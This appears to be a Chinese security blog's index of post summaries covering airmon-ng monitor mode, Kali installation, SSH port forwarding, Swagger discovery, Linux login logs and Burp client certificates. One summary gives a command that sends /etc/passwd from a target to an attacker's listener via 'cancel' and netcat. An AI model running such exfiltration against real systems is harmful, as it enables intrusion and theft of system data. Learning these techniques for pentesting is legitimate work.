摘要:
1:激活网卡监听[monitor]模式 airmon-ng <start|stop> <interface> [channel] or airmon-ng <check|check kill> 需要注意的问题: 1:执行 check kill 删除网卡干扰因素之后,想正常使用的网卡的话。会出现找不到 阅读全文
摘要:
来来回回 反反复复 关于kali的资料看了不少,了解的也不少 所谓的了解只是停留在的了解的基础上, 终于狠下心来,直接在小米的笔记本上安装了 kali。 在强迫自己一把。 人对事物的认知不一样,那么及时看同样的内容,对他的理解也是不一样的 不知道能坚持多久, 但是,在让自己努力一把! 阅读全文
该文被密码保护。 阅读全文
摘要:
SSH 端口转发: SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件,将 GatewayPorts修改为yes -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行远程指令 -R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口 -L 本地端口转发 -D 阅读全文
摘要:
靶机无回显的情况下,可使用 cancel 来把回显发送到攻击机端 cancel -u "$(cat /etc/passwd)" -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示: 攻击机ip:192.168.0.101 linux靶机端执行 : cancel 阅读全文
摘要:
之前渗透遇到过好几次,当时没怎么注意该如何使用,正好看到了一篇不错的文章。学习记录汇总如下: 如何查找 如何使用 遇到问题小技巧 1:如何查找 把以下目录直接增加到字典中, /swagger/ /api/swagger/ /swagger/ui/ /api/swagger/ui/ /swagger- 阅读全文
摘要:
正常登陆 Linux 以下几个位置记录相关日志: SSH登录操作相关的日志有以下几个位置: /var/log/btmp,记录错误的登录尝试,查询命令:lastb /var/log/auth.log,记录认证成功的用户 /var/log/secure,记录与安全相关的日志信息 /var/log/las 阅读全文
摘要:
原文地址: https://www.freebuf.com/articles/web/218397.html 服务器要验证客户端的证书的时候,需要现在客户端里面寻找到证书,在 burp里面 吧证书导入进去之后再抓包 阅读全文